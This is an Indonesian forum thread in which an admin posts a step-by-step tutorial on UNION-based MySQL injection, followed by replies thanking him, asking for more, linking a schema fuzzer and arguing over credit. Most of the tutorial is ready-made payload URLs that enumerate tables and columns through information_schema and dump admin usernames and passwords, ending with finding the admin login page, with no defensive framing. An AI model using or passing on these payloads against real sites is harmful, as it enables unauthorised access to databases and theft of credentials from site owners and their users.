Soldier Of Allah adalah Team Pembela Islam
 
IndeksPortalCalendarFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 [Tutorial] SQL-injection

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
DexteR
Admin
Admin
avatar

Jumlah posting : 9
Join date : 04.01.10
Age : 30
Lokasi : Indonesia , Palembang

PostSubyek: [Tutorial] SQL-injection   Wed Jan 06, 2010 1:53 pm

Assallamualaikum Wr Wb

mungkin repost tapi semogaberguna Smile


[size=15]Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
Code:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:
Code:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
Code:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


===========
=step Empat:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
= step Lima: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://soai.forumotion.com/ascii-h1.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Enam:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
= step Tujuh:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka Smile


======================================
syukron to my friend : Gonzhack selaku owner


Terakhir diubah oleh DexteR tanggal Thu Jul 15, 2010 12:55 pm, total 1 kali diubah
Kembali Ke Atas Go down
Lihat profil user
Neo|g4br1eL



Jumlah posting : 86
Join date : 07.01.10

PostSubyek: Re: [Tutorial] SQL-injection   Thu Jan 07, 2010 12:58 am

saya pelajarin dulu yah kak Smile
Kembali Ke Atas Go down
Lihat profil user
Tamu
Tamu



PostSubyek: Re: [Tutorial] SQL-injection   Thu Jan 07, 2010 1:03 am

Numpang ngambil ilmu , Bismillah
Kembali Ke Atas Go down
SyNTaX eRRoR

avatar

Jumlah posting : 28
Join date : 12.01.10

PostSubyek: Re: [Tutorial] SQL-injection   Tue Jan 12, 2010 7:02 am

Ikut Belajar yah kk Very Happy
Kembali Ke Atas Go down
Lihat profil user
sikat_WC



Jumlah posting : 1
Join date : 13.01.10

PostSubyek: Re: [Tutorial] SQL-injection   Wed Jan 13, 2010 3:14 am

nyoba belajar ah... Laughing
Kembali Ke Atas Go down
Lihat profil user
Gariz_Keraz

avatar

Jumlah posting : 120
Join date : 12.01.10
Age : 23
Lokasi : Mojokerto

PostSubyek: Re: [Tutorial] SQL-injection   Wed Jan 13, 2010 4:27 am

Ane Numpang Ngambil Ilmunya....
Kembali Ke Atas Go down
Lihat profil user http://www.afz-devils.co.cc
abbsolut_sakit_jiwa

avatar

Jumlah posting : 11
Join date : 12.01.10
Age : 31
Lokasi : HeLL

PostSubyek: Re: [Tutorial] SQL-injection   Thu Jan 14, 2010 10:35 am

mantep gan...versi 5 banyak yg kecolong heee..klo TIPS sql versi 4 ada gk gan??
kagak ngerti nebak2 V.4 Very Happy

di tunggu tutornya gan
syukron all crew hamba allah
Kembali Ke Atas Go down
Lihat profil user
kitt99

avatar

Jumlah posting : 8
Join date : 08.01.10
Lokasi : /home

PostSubyek: Re: [Tutorial] SQL-injection   Fri Jan 15, 2010 2:27 am

abbsolut_sakit_jiwa wrote:
mantep gan...versi 5 banyak yg kecolong heee..klo TIPS sql versi 4 ada gk gan??
kagak ngerti nebak2 V.4 Very Happy

di tunggu tutornya gan
syukron all crew hamba allah

klo tebak versi 4 pakai schemafuzz aja akhi

http://www.darkc0de.com/others/schemafuzz.py
Kembali Ke Atas Go down
Lihat profil user
abbsolut_sakit_jiwa

avatar

Jumlah posting : 11
Join date : 12.01.10
Age : 31
Lokasi : HeLL

PostSubyek: Re: [Tutorial] SQL-injection   Fri Jan 15, 2010 5:52 am

kitt99 wrote:
abbsolut_sakit_jiwa wrote:
mantep gan...versi 5 banyak yg kecolong heee..klo TIPS sql versi 4 ada gk gan??
kagak ngerti nebak2 V.4 Very Happy

di tunggu tutornya gan
syukron all crew hamba allah

klo tebak versi 4 pakai schemafuzz aja akhi

http://www.darkc0de.com/others/schemafuzz.py


Ok gan..trus command lwat cmd nya gmana tuh gan?? masih bingung Very Happy
Kembali Ke Atas Go down
Lihat profil user
demnas

avatar

Jumlah posting : 12
Join date : 15.01.10

PostSubyek: Re: [Tutorial] SQL-injection   Fri Jan 15, 2010 11:05 pm

wew....
mAntaf bro... !!!
untuk yang sql versi 4 adagak bro ?
Kembali Ke Atas Go down
Lihat profil user
misterfribo



Jumlah posting : 8
Join date : 04.01.10

PostSubyek: Re: [Tutorial] SQL-injection   Fri Feb 26, 2010 7:48 pm

Creditnya jgan lupa.......!

itu Punya Gonzhack..!
Kembali Ke Atas Go down
Lihat profil user
ch3rub1m

avatar

Jumlah posting : 1
Join date : 27.02.10

PostSubyek: Re: [Tutorial] SQL-injection   Sat Feb 27, 2010 4:00 am

DExter gw jg ga tau u sengaja ato lupa mencantumkan nama pembuat ne tutorial...yg bisa d liat di http://packetstormsecurity.org/papers/database/mysql-injection.txt
n apa u mau jadi malingsial versi indo????
n then ini "thanks to my friend : OrangBego" maksud u siapa ha???yg kami tau ne tutor pencipta nya cuma satu,yaitu gonzhack Suspect
Kembali Ke Atas Go down
Lihat profil user
bumble_be



Jumlah posting : 3
Join date : 27.02.10

PostSubyek: Re: [Tutorial] SQL-injection   Sat Feb 27, 2010 9:56 am

creditny jgn lp..
Kembali Ke Atas Go down
Lihat profil user
T-roy

avatar

Jumlah posting : 4
Join date : 03.05.10

PostSubyek: Re: [Tutorial] SQL-injection   Mon May 03, 2010 6:34 am

seppp.
Kembali Ke Atas Go down
Lihat profil user
aldy_182

avatar

Jumlah posting : 2
Join date : 04.05.10

PostSubyek: Re: [Tutorial] SQL-injection   Tue May 04, 2010 9:39 am

Nice inpoh om ijin copas yach bounce
Kembali Ke Atas Go down
Lihat profil user
ihin



Jumlah posting : 1
Join date : 07.05.10

PostSubyek: Re: [Tutorial] SQL-injection   Fri May 07, 2010 6:33 pm

numpang sodat ya y KK
Kembali Ke Atas Go down
Lihat profil user
LOL1ds

avatar

Jumlah posting : 2
Join date : 08.05.10
Lokasi : ./r00t/M0x3Rkru

PostSubyek: Re: [Tutorial] SQL-injection   Sat May 08, 2010 1:16 pm

Thx kk infonya... Very Happy
Kembali Ke Atas Go down
Lihat profil user
billymoed

avatar

Jumlah posting : 4
Join date : 31.01.10
Age : 23

PostSubyek: Re: [Tutorial] SQL-injection   Sun May 09, 2010 5:38 pm

ikut belajar yah... Smile
Kembali Ke Atas Go down
Lihat profil user http://www.billymoed.info
El-Farhatz

avatar

Jumlah posting : 60
Join date : 20.03.10
Lokasi : Bumi Allah

PostSubyek: Re: [Tutorial] SQL-injection   Wed May 12, 2010 12:19 am

@atas ,,, merendah aja neh om billi Smile) ,


Terakhir diubah oleh El-Farhatz tanggal Mon Oct 22, 2012 11:31 pm, total 1 kali diubah
Kembali Ke Atas Go down
Lihat profil user
apiedsz88

avatar

Jumlah posting : 4
Join date : 16.01.10
Age : 28
Lokasi : Malang

PostSubyek: Re: [Tutorial] SQL-injection   Sat May 22, 2010 6:46 am

hancurkan... !!!!
Kembali Ke Atas Go down
Lihat profil user http://cr7-fanyfauzi.blogspot.com
Ghur4b4



Jumlah posting : 15
Join date : 23.06.10

PostSubyek: Re: [Tutorial] SQL-injection   Wed Jun 23, 2010 11:17 pm

cheers coba dulu ah
Kembali Ke Atas Go down
Lihat profil user
SikuruZ



Jumlah posting : 56
Join date : 07.01.10
Age : 23
Lokasi : Sumatra selatan . Lubuklinggau

PostSubyek: Re: [Tutorial] SQL-injection   Thu Jun 24, 2010 3:00 am

alhamdulillah.
akhir nya dapat juga .
terimakasih akhi dexter Very Happy .
.
Kembali Ke Atas Go down
Lihat profil user http://sikuruz.co.tv
chowwank



Jumlah posting : 1
Join date : 18.05.11

PostSubyek: Re: [Tutorial] SQL-injection   Wed May 18, 2011 8:58 am

syukron atas ilmunya akhi,, Very Happy
Kembali Ke Atas Go down
Lihat profil user
destroyed



Jumlah posting : 2
Join date : 13.01.10

PostSubyek: Re: [Tutorial] SQL-injection   Sun Jun 03, 2012 12:48 am

ijim copas
Kembali Ke Atas Go down
Lihat profil user
DJ-Yuti



Jumlah posting : 1
Join date : 03.07.12

PostSubyek: Re: [Tutorial] SQL-injection   Tue Jul 03, 2012 8:07 am

Gann Minta link download SQL yg 5 donk
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: [Tutorial] SQL-injection   

Kembali Ke Atas Go down
 
[Tutorial] SQL-injection
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Soldier Of Allah - Indonesia :: Jihad Area :: Tutorial-
Navigasi: